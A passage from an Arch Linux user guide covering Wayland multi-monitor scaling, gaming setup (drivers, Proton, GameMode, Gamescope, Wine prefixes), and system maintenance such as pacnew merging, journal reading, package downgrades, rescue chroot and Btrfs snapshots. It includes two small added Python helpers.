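The title "Tiling, gaps and borders - Mozilla Firefox" is the edge case: a naive split(",") would chop it into three fields, which is exactly the kind of bug that surfaces only when a user opens a page with a comma in its name.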
7.5.3 Demonization (Systemd User Services in WMs)
In a traditional desktop environment, the session starts your notification daemon and wallpaper for you. In a bare tiling environment you start them yourself. A common rookie mistake is to do it with lines such as exec-once = dunst in the configuration file: if the program crashes, nothing restarts it, and its output goes nowhere.
The expert way is to delegate the startup of desktop tools to your systemd user instance (Chapter 10). You write units such as ~/.config/systemd/user/waybar.service and ~/.config/systemd/user/hyprpaper.service with Restart=on-failure and start them from the compositor (exec-once = systemctl --user start waybar.service); the window manager only draws the screen while systemd supervises, restarts and logs every piece of your rice. One caveat: a user service does not inherit the compositor's environment, so before starting anything export the variables those tools need with dbus-update-activation-environment --systemd WAYLAND_DISPLAY HYPRLAND_INSTANCE_SIGNATURE (or systemctl --user import-environment), otherwise waybar starts and immediately fails to find a display.
7.6 The HiDPI Nightmare and Multi-Monitor Solutions ↑ Home
If you have a 1080p monitor and a 4K monitor side-by-side, you've entered the territory where Windows and macOS traditionally struggle, and where X11 fails catastrophically. In X11, the entire combined display (the two physical screens) is considered a single "X Screen." You can't tell X11 to scale the 4K monitor to 200% and the 1080p monitor to 100%. The 4K windows will appear tiny, or the 1080p windows will appear gigantic.
Wayland, thanks to its modern architecture (drm/KMS), treats each screen as an absolutely independent canvas with an isolated memory buffer.
7.6.1 Fractional Scaling in Wayland
If you have a 1440p (2K) monitor, 100% scaling makes text small and 200% makes it ridiculously large; you want 150% (fractional scaling). In your compositor's settings (e.g. hyprland.conf for Hyprland):
# Monitor 1 (4K) at 144Hz, scaled 200%: 3840 physical px = 1920 logical px
monitor=DP-1,3840x2160@144,0x0,2
# Monitor 2 (1440p) at 60Hz to the right (so at logical x=1920), scaled 150%
monitor=HDMI-A-1,2560x1440@60,1920x0,1.5
XWayland warning: older applications that do not speak Wayland (some games, older Electron programs) run on top of XWayland. With fractional scaling (1.5x) the X11 client draws at 1x and the compositor then stretches the image by 150%, which produces blur. To avoid it, make your applications (Firefox, VSCode, Discord) use their native Wayland backends; for the ones that cannot, Hyprland's xwayland { force_zero_scaling = true } stops the upscaling and lets you scale the X11 application itself through GDK_SCALE or the toolkit's own setting.
For Electron applications (VSCode, Discord), start them with the Ozone flags:
code --enable-features=UseOzonePlatform --ozone-platform=wayland
(recent Electron and Chromium builds also accept --ozone-platform-hint=auto). The text stops being blurry because it is now rendered at the compositor's real scale instead of being upscaled as a bitmap.
7.6.2 Headless Virtual Monitors (Software KVMs)
An advanced trick: if you have a powerful laptop with a broken screen or an Arch server in a closet, Wayland lets you create a monitor that does not physically exist. With an IPC command (in Hyprland, hyprctl output create headless) the compositor allocates a virtual output, a framebuffer with no cable attached, at whatever resolution you ask for (4K included).
Then, you can use an advanced remote desktop protocol (like Sunshine/Moonlight or WayVNC) to capture that invisible buffer and send it over your local network to your iPad, Smart TV, or lightweight laptop. You'll be utilizing 100% of the server computer's graphics card power (playing AAA games at ultra settings) while receiving the compressed video in real time on a low-power device in the living room.
This architecture turns any Arch Linux machine into a private visual computing cloud server.
Chapter 8: Gaming and Extreme Graphics Performance ↑ Home
In the last decade, Linux has gone from being a desolate wasteland for gaming to being the base platform of the most successful handheld console (Steam Deck). Arch Linux, thanks to its rolling-release model, is one of the best distributions for gaming: you get the latest kernel and graphics drivers as soon as they are released, which often brings large FPS (frames per second) gains for newly released (day-one) titles.
In this chapter we will analyze the inner workings of graphics drivers, the Proton translation layer, and the performance utilities that can make a game run better on Arch than on Windows.
8.1 Kernel-Level Graphics Drivers (KMS/DRM) ↑ Home
For serious gaming, the open-source Mesa drivers installed by default are not always enough: the Vulkan implementation for your GPU and the 32-bit libraries needed by Steam and Wine must be installed explicitly.
8.1.1 AMD (Radeon) Architecture
If you have an AMD graphics card you are in Linux paradise: AMD keeps its drivers open source and invests heavily in the kernel. There are two kernel modules for AMD: the legacy radeon (pre-GCN and early GCN cards) and the modern amdgpu. Make sure the [multilib] repository is enabled (Chapter 5) and install Mesa's AMD Vulkan implementation (RADV) in both 64- and 32-bit:
sudo pacman -S mesa lib32-mesa vulkan-radeon lib32-vulkan-radeon
Technical note: RADV is Mesa's open-source Vulkan driver, with heavy contributions from Valve. AMD also publishes its own, amdvlk, but RADV consistently offers better performance and lower latency in games.
8.1.2 NVIDIA Architecture (Proprietary Drivers and DKMS)
NVIDIA has historically offered poor open-source support: the free nouveau driver is unusable for modern gaming because NVIDIA withholds the signed firmware needed to raise the clocks. On Arch you therefore install NVIDIA's proprietary driver (for Turing and newer cards there is also nvidia-open / nvidia-open-dkms, NVIDIA's open-source kernel modules, which pair with the same proprietary user-space).
The kernel-update problem: the standard nvidia package is prebuilt only for the official linux kernel (and nvidia-lts for linux-lts). If you run any other kernel, such as linux-zen, there is no prebuilt module, and a kernel update without a matching module leaves you with a black screen on reboot. The professional solution is DKMS (Dynamic Kernel Module Support): a pacman hook recompiles the NVIDIA module automatically whenever a kernel is installed, whichever kernel you use, provided that kernel's headers package (linux-zen-headers, linux-lts-headers, ...) is installed too.
Install the proprietary stack with DKMS:
sudo pacman -S nvidia-dkms nvidia-utils lib32-nvidia-utils
Enable DRM modesetting (critical for Wayland and against tearing): for NVIDIA to work under modern compositors such as Hyprland or GNOME on Wayland, and to avoid tearing on X11, the kernel modesetting parameter must be on. Open /etc/default/grub, find the line GRUB_CMDLINE_LINUX_DEFAULT and add nvidia-drm.modeset=1:
GRUB_CMDLINE_LINUX_DEFAULT="loglevel=3 quiet nvidia-drm.modeset=1"
Rebuild GRUB with sudo grub-mkconfig -o /boot/grub/grub.cfg and reboot. Recent driver releases enable modesetting by default; confirm the effective value after boot with cat /sys/module/nvidia_drm/parameters/modeset (it should print Y).
8.2 The Proton Revolution and Translation APIs (DXVK / VKD3D) ↑ Home
The vast majority of big-budget commercial games are written for DirectX, Microsoft's proprietary graphics API for Windows. A DirectX game cannot talk to Linux or to its native API, Vulkan.
This is where Proton comes in: a heavily modified fork of Wine funded by Valve. Proton intercepts the game's DirectX calls at runtime and translates them to Vulkan using two translation layers:
- DXVK: translates DirectX 9, 10 and 11 to Vulkan.
- VKD3D-Proton: translates the far more complex DirectX 12 to Vulkan.
Thanks to Vulkan's efficiency and the lower background overhead of a lean Linux system, the translation cost is often negligible, and in some cases the translated game runs better than the original on Windows.
8.2.1 Steam Installation and Proton Configuration
Steam on Linux is a native application, but most games are not.
sudo pacman -S steam ttf-liberation
Launch Steam, log in, and go to Settings > Compatibility. Tick:
- Enable Steam Play for supported titles.
- Enable Steam Play for all other titles (lets you try ANY Windows game).
- Select "Proton Experimental" or the latest numbered stable version as the default tool.
Steam will ask to restart. The "Install" button is now enabled for every game in your library regardless of its original operating system.
8.2.2 Games outside of Steam: Lutris and Heroic
For games from Epic Games, GOG, Amazon Games or loose .exe installers, Steam will not do.
- Lutris: the all-purpose game manager for Linux. It runs community-maintained install scripts that fetch the obscure Windows dependencies a game needs (old C++ runtimes, fonts) so that it works with one click.
sudo pacman -S lutris
- Heroic Games Launcher: the unofficial (and, on Linux, far better) open-source client for Epic Games and GOG. It downloads and installs games and lets you plug in custom Proton builds such as Proton-GE (maintained by GloriousEggroll), which bundles media codecs Valve cannot ship for licensing reasons.
yay -S heroic-games-launcher-bin
8.3 Maximizing Performance (FPS) and Tool Injection ↑ Home
On Linux, you have complete control over your hardware resources. The community has developed tools (used extensively on the Steam Deck) to encapsulate games, trick them, and squeeze every last bit of CPU bandwidth out of them.
8.3.1 Feral GameMode (Automatic System Overclocking)
GameMode is a daemon (gamemoded) that, when a game starts, raises the game process's priority, switches the CPU governor to "performance" (so the cores do not throttle to save power), inhibits the screensaver and can run custom scripts (for example, disabling the X11 compositor). When the game exits it restores the previous state. The client talks to the daemon over D-Bus, so no root shell is needed in the game's launch command.
Installation:
sudo pacman -S gamemode lib32-gamemode
To use it with a Steam game, right-click the game > Properties > Launch Options and add:
gamemoderun %command%
8.3.2 Gamescope (The Micro-Compositor)
A common problem when gaming on Linux is that the game tries to change the resolution of the whole monitor (wrecking the desktop layout) or that the mouse cursor wanders onto a second monitor mid-battle. Gamescope runs the game inside an isolated nested Wayland session, so the game believes it owns the only display in existence. Gamescope also provides FSR (FidelityFX Super Resolution) upscaling at the system level: you can have a demanding game render internally at 720p and let Gamescope upscale it to 1440p (or 4K) on your monitor. The game sees a 720p display and produces many more frames, while you see a picture close to native resolution (the FSR in Gamescope is a spatial upscaler, not an AI one).
Installation:
sudo pacman -S gamescope
Usage in Steam launch options (internal rendering 1080p, output 1440p with FSR):
gamescope -h 1080 -H 1440 -U -f -- %command%
(-U enables FSR, -f forces fullscreen, -h/-H are the game's and the output's heights.)
8.3.3 Real-Time Telemetry (MangoHud)
You know those YouTube GPU comparisons with an overlay in the corner showing temperature, VRAM usage and an FPS graph? That is MSI Afterburner on Windows. On Linux we use MangoHud, a Vulkan/OpenGL layer injected into the game's rendering calls.
Installation:
sudo pacman -S mangohud lib32-mangohud
To activate it for a Steam game, in the launch options:
mangohud %command%
(Yes, you can chain the wrappers: mangohud gamemoderun %command%.)
8.4 The Last Bastion: Anti-Cheats ↑ Home
All of the above sounds like technological magic, and it is. Today, Cyberpunk 2077, Elden Ring, Red Dead Redemption 2, or Baldur's Gate 3 will run on Arch Linux at Ultra settings with 60+ FPS without you having to open a single terminal. The only real problem for gaming on Linux is competitive multiplayer games.
To prevent cheating, companies such as Riot Games (Valorant, League of Legends) and Activision (Call of Duty) use anti-cheat software (Vanguard, Ricochet) installed at the Windows kernel level (Ring 0). They function as legal rootkits. When such a game is run through Proton, the anti-cheat cannot find the Windows kernel it expects and refuses to start. These games are unplayable on Linux.
However, the two most widely used anti-cheat systems, Easy Anti-Cheat (EAC) and BattlEye, announced official support for Linux and Proton, and each publisher decides whether to switch it on. Games whose publishers have done so (The Finals, for example), plus native titles such as Counter-Strike 2, run on Arch Linux; a publisher can also withdraw it later, as happened with Apex Legends in 2024.
The must-visit site for any Arch gamer is ProtonDB (protondb.com). Before buying or downloading a game, look it up there: the community reports whether it works out of the box (Platinum/Gold) or whether the developer has blocked it through the anti-cheat ("Borked").
8.5 Thermal and Energy Control: Overclocking and Undervolting ↑ Home
A system administrator or enthusiast gamer does not settle for factory clocks and voltages. Undervolting a graphics card can lower its temperature by around 10 °C and bring fan noise close to silence while keeping the same performance.
8.5.1 AMD Environment (AMDGPU Sysfs and CoreCtrl)
The open-source amdgpu driver exposes almost all of its telemetry and tuning knobs through sysfs (/sys/class/drm/cardN/device/, where N depends on enumeration order; check which cardN is your GPU). You could overclock by writing numbers into those files, but it is error-prone and tedious. To do it safely and visually, install CoreCtrl, the Linux counterpart of MSI Afterburner:
sudo pacman -S corectrl
For CoreCtrl to change clocks and voltages, the kernel must be booted with a parameter that unlocks amdgpu's PowerPlay tuning features. Open /etc/default/grub and add to GRUB_CMDLINE_LINUX_DEFAULT:
amdgpu.ppfeaturemask=0xffffffff
Regenerate GRUB and reboot. In CoreCtrl you will find fan curves editable with graphical nodes, 3D profiles and the card's power limit, which you can lower from, say, 200W to 150W for a large efficiency gain at little cost in FPS.
8.5.2 NVIDIA Environment (Coolbits and GreenWithEnvy)
NVIDIA disables overclocking on Linux unless you enable a documented flag, Coolbits, in the X11 server configuration (it is an X11 option; these controls are not exposed under Wayland).
To enable it, let nvidia-xconfig generate the configuration with the value 31 (which unlocks clock offsets, fan control and voltage offsets):
sudo nvidia-xconfig --cool-bits=31
Next, install GreenWithEnvy (GWE) from the AUR:
yay -S gwe
With GWE you can alter the core clock offset and the memory (VRAM) clock offset. A few hundred MHz on the memory clock of a 30- or 40-series card can yield a few percent more FPS with little additional heat; raise it in small steps and stop at the first artifact or crash.
8.6 Understanding the Wine Sub-Architecture ↑ Home
Not everything in life revolves around playing games through Steam (Proton). Many Arch Linux users rely on highly specialized Windows software (music production DAWs like FL Studio/Ableton, CAD modeling tools, or Adobe suites). To run these powerful programs, we don't use generic Wine. We manipulate the prefixes .
8.6.1 The Concept of the Isolated WINEPREFIX
A Wine prefix is a folder that simulates the C:\ drive of a Windows machine. By default, if you run wine programa.exe, everything is installed in ~/.wine/. That is a big mistake: install ten programs in the same prefix and their DLL overrides and registry tweaks start fighting each other, creating conflicts that are hard to untangle.
The iron law: every heavy application gets its own isolated prefix.
# Create a clean "C:\" prefix specifically for FL Studio
WINEPREFIX=~/.wine-flstudio winecfg
This command opens Wine's configuration dialog and creates a pristine C:\ drive inside that hidden folder.
8.6.2 Winetricks and DLL Manipulation
When you install FL Studio, it will probably crash silently when launched. Why? Because it expects your "Windows" to have the Microsoft Visual C++ redistributables and certain fonts that the installer assumes are present. Wine is a clean-room reimplementation, so it does not ship Microsoft's proprietary code. To inject it, we use Winetricks, a helper script.
sudo pacman -S winetricks
To download and install the .NET Framework 4.8, the DirectX 9 shader compiler, Microsoft's core fonts (Arial, etc.) and the 2015 C++ runtime into our FL Studio prefix:
WINEPREFIX=~/.wine-flstudio winetricks dotnet48 d3dcompiler_47 corefonts vcrun2015
The script downloads the official installers (verifying their checksums), extracts the real .dll files into the prefix, and records DLL overrides in the prefix registry (user.reg) so that Wine loads them instead of its own built-in implementations.
8.6.3 Windows Registry Editing
Just as on a real system, you can inject keys into the simulated machine's registry to fix bugs (for example, scaling the interface when it looks too small on a 4K monitor):
WINEPREFIX=~/.wine-flstudio wine regedit
This isolated, reproducible architecture, driven by environment variables, lets sysadmins package closed Windows applications into double-click bash launchers, making hostile proprietary software run tamely in your free environment.
Chapter 9: System Maintenance, Monitoring, and Recovery ↑ Home
One of the most persistent (and unfair) myths about Arch Linux is that it "breaks itself" with every update. This is demonstrably false. Arch Linux doesn't break itself; users break it by not reading, performing partial updates, or ignoring configuration maintenance alerts. In a rolling release model, you are the system administrator. You have complete control, and with it, the responsibility. This chapter will teach you the tools and habits to keep an Arch machine running without reinstalling for a decade.
9.1 Change Management (The .pacnew files) ↑ Home
When the Arch development team (or upstream) decides to change a program's default behavior, they modify its configuration file. But imagine the disaster if you spent 3 hours modifying your SSH server's configuration file ( /etc/ssh/sshd_config) and suddenly, a routine update overwrites your file with the new default file.
To protect your work, pacman does the following for files a package marks as configuration (its backup array): if the file on disk differs from the version the old package shipped, it does not overwrite it. It installs the new default alongside, with the extension .pacnew (for example /etc/ssh/sshd_config.pacnew), and the program keeps using your original. The mirror case, .pacsave, is what you get when a package is removed while you had edited its configuration.
The danger: if you ignore .pacnew files for months or years, you eventually reach a release where the program's new binary needs a directive that only exists in the .pacnew, and because you are still using the old file the program (or even your boot) fails, often silently.
9.1.1 Professional Resolution with Pacdiff
Never hunt for .pacnew files by hand. Install pacman-contrib (which provides pacdiff) and a visual merge (diff) tool such as meld if you are in a graphical environment, or simply use vimdiff (included with Vim).
sudo pacman -S pacman-contrib meld
To find, compare and merge your configuration files periodically (once a month is a good rhythm):
sudo DIFFPROG=meld pacdiff
The script scans the system in a second and, for each .pacnew it finds, offers to:
- view the differences;
- overwrite your old file (if you realise you had not changed anything important);
- remove the new file (if you prefer to keep yours, at your own risk);
- merge the lines in meld, which opens two columns highlighting the changes so you can drag in the new directives without losing your customizations.
Pay particular attention to security-relevant files such as /etc/ssh/sshd_config and the /etc/pam.d/ policies: a new directive in the .pacnew may be exactly what keeps a hardening option effective on the new version.
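What pacdiff does mechanically, as an added Python example (not pacdiff's code nor this book's): walk a tree for .pacnew/.pacsave files, pair each with its live counterpart and produce a unified diff, plus a helper that lists which sshd_config-style directives actually changed so you can spot a hardening option that a new default would weaken. The sshd_config pair it examines is constructed in a temporary directory; point find_pacfiles at /etc to use it for real.

```python
"""Added example: find .pacnew/.pacsave files and show what changed, as pacdiff does.

Not the page's or pacman-contrib's code. It walks a directory tree (default /etc),
pairs every `foo.pacnew` with its live `foo`, and returns a unified diff so you can
review what upstream changed before merging. The sample files in demo() are constructed.
"""
import difflib
import os
import tempfile

SUFFIXES = (".pacnew", ".pacsave")


def find_pacfiles(root="/etc"):
    """Sorted paths of every *.pacnew / *.pacsave under root."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.endswith(SUFFIXES):
                hits.append(os.path.join(dirpath, name))
    return sorted(hits)


def live_counterpart(pacfile):
    """'/etc/ssh/sshd_config.pacnew' -> '/etc/ssh/sshd_config'"""
    for s in SUFFIXES:
        if pacfile.endswith(s):
            return pacfile[: -len(s)]
    raise ValueError(f"not a pacnew/pacsave file: {pacfile}")


def unified_diff(pacfile):
    """Lines of a unified diff from the live file to the .pacnew (or .pacsave)."""
    live = live_counterpart(pacfile)
    with open(live) as f:
        old = f.readlines()
    with open(pacfile) as f:
        new = f.readlines()
    return list(difflib.unified_diff(old, new, fromfile=live, tofile=pacfile))


def _directives(path):
    """Parse `Key value` lines (sshd_config style), skipping comments and blanks."""
    out = {}
    with open(path) as f:
        for line in f:
            line = line.strip()
            if not line or line.startswith("#"):
                continue
            key, _, val = line.partition(" ")
            out[key] = val.strip()
    return out


def changed_directives(pacfile):
    """{key: (live_value, pacnew_value)} for every directive whose effective value differs.
    A commented-out default in the .pacnew shows up as None, i.e. 'upstream no longer sets this'."""
    old, new = _directives(live_counterpart(pacfile)), _directives(pacfile)
    keys = sorted(set(old) | set(new))
    return {k: (old.get(k), new.get(k)) for k in keys if old.get(k) != new.get(k)}


def demo():
    """Constructed /etc: a hand-hardened sshd_config next to a new upstream default."""
    with tempfile.TemporaryDirectory() as etc:
        d = os.path.join(etc, "ssh")
        os.makedirs(d)
        with open(os.path.join(d, "sshd_config"), "w") as f:
            f.write("# my hardened config\nPort 2222\nPermitRootLogin no\nPasswordAuthentication no\n")
        with open(os.path.join(d, "sshd_config.pacnew"), "w") as f:
            f.write("# upstream default\n#Port 22\nPermitRootLogin prohibit-password\n"
                    "KbdInteractiveAuthentication no\n")
        hits = find_pacfiles(etc)
        rel = [os.path.relpath(h, etc) for h in hits]
        return rel, changed_directives(hits[0]), unified_diff(hits[0])


if __name__ == "__main__":
    rel, changed, diff = demo()
    print(rel)
    for key, (old, new) in changed.items():
        print(f"{key}: live={old!r} pacnew={new!r}")
    print("".join(diff))
```

The directive view is the one to read first on a security-relevant file: here it tells you that upstream now ships KbdInteractiveAuthentication and no longer sets a Port, while your PasswordAuthentication no and Port 2222 exist only in the live file, so a blind "overwrite with the new file" would silently re-enable password logins on port 22.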
9.2 The Intelligence Center: Reading Logs and dmesg ↑ Home
When something goes wrong in Windows, you often get an incomprehensible hexadecimal code (e.g., 0x80004005). In Linux, the system logs every event in text format. Understanding where to read that code is 90% of the troubleshooting.
9.2.1 The Kernel Buffer (dmesg)
During startup, and while the system is running, the kernel and its drivers log messages before any logging daemon can start. This is the hardware-level (Ring 0) log. If a hard drive is about to fail with I/O errors, or you plug in a corrupted USB stick, this is where the alarm bells ring first.
To view the kernel ring buffer:
sudo dmesg -H
The -H flag makes the output human-readable, paginated and with timestamps; press space to scroll and q to quit. To follow messages live while you plug in devices: sudo dmesg -w.
9.2.2 Systemd Journal (journalctl)
For everything above the kernel (web server, graphical session, network failures), systemd collects logs into a fast, centralized binary journal, read with the Swiss Army knife journalctl. (Reading the full system journal requires root or membership of the systemd-journal group.)
- View the current boot's log:
journalctl -b
- View the log of the PREVIOUS boot (-1): critical when the PC froze and you had to force a restart, since it shows the last thing that happened before the freeze.
journalctl -b -1
- Filter only high-priority, catastrophic errors (priority 3 = err). This is the magic command when the PC misbehaves and you do not know why: it drops the informational noise and shows the raw errors, with -x adding explanatory text where available:
journalctl -p 3 -xb
- Follow a problematic service in real time (e.g. Bluetooth fails to connect from the top panel; open a terminal and watch the live log):
journalctl -u bluetooth.service -f
9.3 Version Control: The Art of Downgrading ↑ Home
In a bleeding-edge model like Arch's, upstream developers occasionally release code with regressions (bugs that break what used to work). If, after a pacman -Syu, your browser (say, Firefox) crashes with a segmentation fault and will not open, do not panic or reinstall Arch. The fix is one command.
9.3.1 Return to a local version from the cache
As we saw in Chapter 5, pacman keeps every .pkg.tar.zst it installs in /var/cache/pacman/pkg/ unless you explicitly delete them. If Firefox broke on version 126.0, simply install the older one (e.g. 125.0) that is still stored locally:
# Use Tab to autocomplete the long file name
sudo pacman -U /var/cache/pacman/pkg/firefox-125.0-1-x86_64.pkg.tar.zst
This replaces the new version with the old one (if the matching .sig is still in the cache, pacman verifies it as usual). Two things to keep in mind: tomorrow's pacman -Syu will see an outdated package and upgrade it again, so temporarily add firefox to the IgnorePkg line in /etc/pacman.conf (IgnorePkg = firefox) and remove it weeks later once the bug is fixed upstream; and downgrading a library rather than an application can leave other packages linked against the newer version, which is the partial-upgrade state Arch warns about, so prefer downgrading leaf packages and take any dependency complaint from pacman seriously.
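The cache lookup from this section as an added Python example (not pacman's or this book's code): list the cached builds of a package, order them with an approximation of pacman's vercmp, and pick the newest build older than the installed one. The cache listing it examines is constructed; the version comparison covers epochs, numeric/alpha segments and pkgrel but is an approximation, so settle a doubtful pair with the real vercmp binary.

```python
"""Added example: choose an older build of a package from pacman's cache.

Not pacman's code or the page's. File names follow pacman's
`pkgname-pkgver-pkgrel-arch.pkg.tar.zst`; pkgname may contain hyphens, pkgver
never does, so we split from the right. `vercmp` below approximates pacman's
ordering (epoch, numeric/alpha segments, then pkgrel); use the real `vercmp`
binary to settle a doubtful pair. The cache listing in demo() is constructed.
"""
import os
import re
import tempfile
from functools import cmp_to_key

PKG_EXT = re.compile(r"\.pkg\.tar\.(zst|xz|gz)$")


def parse_pkg_filename(name):
    """'lib32-mesa-24.0.1-1-x86_64.pkg.tar.zst' -> ('lib32-mesa', '24.0.1-1', 'x86_64'); None for .sig etc."""
    base = os.path.basename(name)
    if not PKG_EXT.search(base):
        return None
    try:
        pkgname, ver, rel, arch = PKG_EXT.sub("", base).rsplit("-", 3)
    except ValueError:
        return None
    return pkgname, f"{ver}-{rel}", arch


def _segments(s):
    # numeric chunks compare as ints and rank above alphabetic chunks, as in vercmp
    return [(0, int(t)) if t.isdigit() else (-1, t) for t in re.findall(r"\d+|[A-Za-z]+", s)]


def _cmp_segments(a, b):
    for x, y in zip(a, b):
        if x != y:
            return 1 if x > y else -1
    if len(a) == len(b):
        return 0
    # One side has segments left over. A leftover numeric segment makes it newer
    # ("1.0" > "1"); a leftover alphabetic one makes it older ("1.0rc1" < "1.0").
    longer_is_a = len(a) > len(b)
    leftover = (a if longer_is_a else b)[min(len(a), len(b))]
    longer_newer = leftover[0] == 0
    return 1 if longer_is_a == longer_newer else -1


def _split(full):
    epoch, _, rest = full.rpartition(":")
    ver, _, rel = rest.partition("-")
    return int(epoch or 0), _segments(ver), _segments(rel or "0")


def vercmp(a, b):
    """-1, 0 or 1, approximating `vercmp a b` for 'epoch:pkgver-pkgrel' strings."""
    ea, va, ra = _split(a)
    eb, vb, rb = _split(b)
    if ea != eb:
        return 1 if ea > eb else -1
    return _cmp_segments(va, vb) or _cmp_segments(ra, rb)


def cached_versions(pkgname, cache_dir="/var/cache/pacman/pkg"):
    """[(fullver, path)] of every cached build of pkgname, newest first."""
    found = []
    for entry in os.listdir(cache_dir):
        parsed = parse_pkg_filename(entry)
        if parsed and parsed[0] == pkgname:
            found.append((parsed[1], os.path.join(cache_dir, entry)))
    return sorted(found, key=cmp_to_key(lambda x, y: vercmp(x[0], y[0])), reverse=True)


def previous_version(pkgname, installed, cache_dir="/var/cache/pacman/pkg"):
    """Newest cached build strictly older than `installed` (e.g. '126.0-1'), or None."""
    for fullver, path in cached_versions(pkgname, cache_dir):
        if vercmp(fullver, installed) < 0:
            return fullver, path
    return None


def downgrade_plan(pkgname, installed, cache_dir="/var/cache/pacman/pkg"):
    """Commands to run, or None when nothing older is cached (reach for `downgrade` from the AUR then)."""
    prev = previous_version(pkgname, installed, cache_dir)
    if prev is None:
        return None
    return [f"sudo pacman -U {prev[1]}",
            f"# then, in /etc/pacman.conf, until upstream fixes the bug:  IgnorePkg = {pkgname}"]


def demo():
    """Constructed cache: empty stand-in files named like real packages."""
    files = ["firefox-126.0-1-x86_64.pkg.tar.zst", "firefox-126.0-1-x86_64.pkg.tar.zst.sig",
             "firefox-125.0.1-1-x86_64.pkg.tar.zst", "firefox-125.0-2-x86_64.pkg.tar.zst",
             "firefox-125.0-1-x86_64.pkg.tar.zst",
             "firefox-developer-edition-126.0b9-1-x86_64.pkg.tar.zst",
             "lib32-mesa-24.0.1-1-x86_64.pkg.tar.zst"]
    with tempfile.TemporaryDirectory() as cache:
        for name in files:
            open(os.path.join(cache, name), "w").close()
        versions = [v for v, _ in cached_versions("firefox", cache)]
        prev = previous_version("firefox", "126.0-1", cache)
        return versions, prev[0], os.path.basename(prev[1])


if __name__ == "__main__":
    print(demo())   # (['126.0-1', '125.0.1-1', '125.0-2', '125.0-1'], '125.0.1-1', 'firefox-125.0.1-1-x86_64.pkg.tar.zst')
```

Note the two traps the filename parser avoids: firefox-developer-edition is a different package even though its name starts with firefox-, and the .sig next to each package is not a package.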
9.3.2 The AUR 'downgrade' Tool
If you cleaned your cache yesterday, or the cached package is corrupted, pacman cannot help. For that scenario there is downgrade (in the AUR), which queries the Arch Linux Archive (ALA, archive.archlinux.org), where the project stores copies of every package from recent years.
yay -S downgrade
sudo downgrade firefox
A menu lists the most recent versions of Firefox with their dates. Enter the number of the version that worked; the script downloads it from the archive, installs it and, importantly, asks whether to add the package to IgnorePkg automatically.
9.4 The Rescue Chroot (Resurrection of a Fallen System) ↑ Home
Even with best practices, human error can occur (for example, unplugging your PC mid-Linux kernel update or during a GRUB regeneration). When you turn your computer back on, you'll see the dreaded black GRUB Rescue menu, or a "Kernel Panic," and no keys will respond. The operating system is "broken" and cannot boot.
Golden Rule: A Linux system with intact data on the hard drive is never irreparably broken. If you can access the files, you can fix it.
The surgical rescue protocol uses your Arch Linux installation USB:
- Phase 1: The Bypass. Insert your Arch USB drive (the one you used in Chapter 1), turn on your PC and boot from it. You are now using the kernel on the USB drive, bypassing the corrupted kernel on your hard drive.
- Phase 2: Connection. Connect to the internet (iwctl or a cable); it is indispensable.
- Phase 3: The Forensic Assembly. Mount your damaged partitions exactly as you did during the first installation:
mount /dev/nvme0n1p3 /mnt
mount /dev/nvme0n1p1 /mnt/boot
- Phase 4: The Injection (Chroot). You enter your broken system like a parasite:
arch-chroot /mnt
- Phase 5: The Operation. You are now root inside your broken system, with internet access, but the machine is only running thanks to the USB drive. Here's how you fix the mess:
  - Did the kernel become partially corrupted by a power outage? Reinstall it:
  pacman -S linux
  - Did you update packages but the system froze halfway through? Force a full resynchronization, repairing the cross-dependencies:
  pacman -Syu
  - Did you damage the GRUB bootloader? Reinstall the UEFI binary (as we saw in Chapter 3):
  grub-install --target=x86_64-efi --efi-directory=/boot --bootloader-id=GRUB
  and then grub-mkconfig -o /boot/grub/grub.cfg.
  - Forgot your root or user password? Run passwd tu_usuario (with your user name in place of tu_usuario), set a new one, and that's it. This is why LUKS disk encryption is so important: anyone with a USB drive can perform this chroot procedure and change your password if your PC is stolen.
- Phase 6: The Exit. Leave the chroot (exit), unmount everything (umount -R /mnt) and reboot.
Your system will rise from the ashes, perfectly functional, without losing a single byte of data. This is the true power of system control in The Arch Way.
9.5 The Ultimate Safety Net: Btrfs and Snapshots (Snapper) ↑ Home
Everything you've read in this manual about fixing your system with a rescue USB drive (Chapter 9.4) assumes you have the time and the inclination. But what if you're about to give a presentation to investors, you run pacman -Syu, the graphics server crashes, and the meeting starts in 2 minutes? You don't have time for chroot forensics.
If, during Chapter 2, you formatted your root partition (/) with the modern Btrfs file system, you possess the superpower of atomic snapshots.
Btrfs does not overwrite files when you change them (Copy-on-Write). If you install a package, Btrfs writes the new data blocks elsewhere. A "snapshot" in Btrfs is simply an instant photograph (it takes milliseconds and uses 0 additional kilobytes) of the exact state of your system.
9.5.1 Snapper Installation and Configuration
The tool created by SUSE to manage this magic is snapper.
sudo pacman -S snapper
Create the configuration for the root file system (/):
sudo snapper -c root create-config /
From this moment on, you can tell the operating system "photograph the entire 'C:' partition right now":
sudo snapper -c root create --description "Antes de la locura"
9.5.2 Automation with Pacman Hooks
Nobody remembers to take a snapshot before updating. We'll configure pacman to do it by itself. Install the hook:
yay -S snap-pac
The next time you run sudo pacman -Syu, before a single package is downloaded the system will freeze a "pre" snapshot, and when the installation finishes it will freeze a "post" snapshot. You can then use snapper diff to see exactly what the update changed on disk.
9.5.3 Time Travel (Rollback at the Start)
If an update breaks your PC, you reboot. Thanks to advanced integrations such as grub-btrfs, GRUB's black menu gains a new section called "Arch Linux Snapshots". You select yesterday afternoon's snapshot, and the system boots exactly as it was yesterday. To make this time jump permanent, you use a restore script (or manual commands on the Btrfs subvolumes) to promote the old snapshot to the main root.
Your Arch Linux has just become literally immortal to software errors.
9.6 Fine Hardware Monitoring and Disaster Prevention ↑ Home
To keep a server or high-performance machine running, you can't wait for the kernel to throw red alerts in dmesg; you should check for physical stress preventively.
9.6.1 Load Profiling (htop / btop)
UNIX administrators despise the graphical "task managers" of desktop environments for their inefficiency and their inaccurate accounting of CPU threads.
- htop: The timeless classic. Accurately displays process states (R running, S sleeping, Z zombie) and memory page faults, and lets you instantly send kill signals (SIGKILL, -9) to rogue processes.
- btop: The successor, written in C++. It has a spectacular character-based user interface (C-UI) in the terminal, drawing continuous graphs of network bandwidth, disk operations (I/O) and per-core temperatures, with an update latency of less than 100 milliseconds.
sudo pacman -S btop
9.6.2 Thermodynamics (lm_sensors)
Motherboards contain dozens of temperature sensors (chipsets, north/south bridges, VRMs, CPU cores). Linux must map them.
sudo pacman -S lm_sensors
Run the detection wizard (answer YES to everything; it will probe your hardware's I2C buses looking for chips):
sudo sensors-detect
From then on, type sensors and the terminal will show you the exact thermal status of your machine.
9.6.3 Hard Drive Health and Bad Sectors (SMART)
